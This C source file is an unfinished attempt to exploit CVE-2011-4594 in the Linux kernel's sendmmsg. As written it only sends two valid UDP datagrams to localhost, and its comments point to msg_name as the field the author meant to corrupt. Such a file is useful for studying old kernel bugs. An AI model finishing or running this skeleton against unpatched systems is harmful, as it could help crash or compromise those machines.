/*
* Socket Splickt
* by zx2c4
*
* This is an attempt to exploit CVE-2011-4594.
*
* It was patched in bc909d9ddbf7778371e36a651d6e4194b1cc7d4c.
*
*/
#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/ethernet.h>
#include <linux/if_packet.h>
#include <asm/unistd.h>
#include <errno.h>
#ifndef __NR_sendmmsg
#if defined( __PPC__)
#define __NR_sendmmsg 349
#elif defined(__x86_64__)
#define __NR_sendmmsg 307
#elif defined(__i386__)
#define __NR_sendmmsg 345
#else
#error __NR_sendmmsg not defined
#endif
#endif
/*
 * Local stand-in for struct mmsghdr, the per-element type of the
 * sendmmsg(2) vector.  It is declared here (and the call is made through
 * a raw syscall below) presumably because the libc this was written
 * against did not yet expose sendmmsg()/struct mmsghdr; the field order
 * and types must match what the kernel reads: an ordinary msghdr followed
 * by a count the kernel fills in on return.
 */
struct reimp_mmsghdr {
    struct msghdr msg_hdr; /* per-message header, exactly as for sendmsg(2) */
    unsigned int msg_len;  /* output field: bytes transmitted for this entry (sendmmsg(2)) */
};
/*
 * Issue the sendmmsg system call directly via syscall(2), bypassing any
 * libc wrapper.
 *
 * fd    - socket to send on
 * mmsg  - array of vlen headers (see struct reimp_mmsghdr)
 * vlen  - number of entries in mmsg
 * flags - sendmsg-style flags passed straight through
 *
 * Returns the raw syscall result narrowed to int: the number of messages
 * sent on success, or -1 with errno set on failure.  The trailing NULL is
 * a fifth argument the sendmmsg syscall does not define; it is retained
 * only to keep the call shape of the original.
 */
static inline int reimp_sendmmsg(int fd, struct reimp_mmsghdr *mmsg, unsigned int vlen, unsigned int flags)
{
    long raw = syscall(__NR_sendmmsg, fd, mmsg, vlen, flags, NULL);
    return (int)raw;
}
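/*
 * Entry point: open a UDP socket and hand two identical, zero-filled
 * 10-byte datagrams addressed to 127.0.0.1:10000 to the kernel in a
 * single sendmmsg call.
 *
 * As written both vector entries are well-formed -- each msg_name points
 * at a valid sockaddr_in and msg_namelen is its exact size -- so on a
 * kernel carrying the fix named in the file header this simply prints
 * "Sent 2 packets.".  The original author left a TODO marking msg_name as
 * the field they intended to vary; nothing here does so.  Nothing is
 * expected to be listening on port 10000.
 *
 * Returns 0 on success, 1 if the socket cannot be created or the send
 * fails; the failing call is reported through perror().
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    const int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0) {
        /* Previously an unchecked -1 was passed on to sendmmsg, which then
         * reported EBADF and hid the real cause of the failure. */
        perror("socket");
        return 1;
    }

    char buf[10] = {0};
    struct iovec iovec[1] = { { .iov_base = buf, .iov_len = sizeof buf } };
    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
        .sin_port = htons(10000),
    };

    enum { NMSG = 2 };
    struct reimp_mmsghdr datagram[NMSG];
    memset(datagram, 0, sizeof datagram);
    for (size_t i = 0; i < NMSG; i++) {
        datagram[i].msg_hdr.msg_iov = iovec;
        datagram[i].msg_hdr.msg_iovlen = 1;
        /* Original author's TODO sat here ("pass something naughty");
         * both entries currently carry the same valid, correctly sized
         * destination. */
        datagram[i].msg_hdr.msg_name = &addr;
        datagram[i].msg_hdr.msg_namelen = sizeof addr;
    }

    int ret = reimp_sendmmsg(fd, datagram, NMSG, 0);
    if (ret < 0) {
        perror("reimp_sendmmsg");
        close(fd);
        return 1;
    }
    /* sendmmsg may legitimately send fewer than NMSG; report what it did. */
    printf("Sent %d packets.\n", ret);
    close(fd);
    return 0;
}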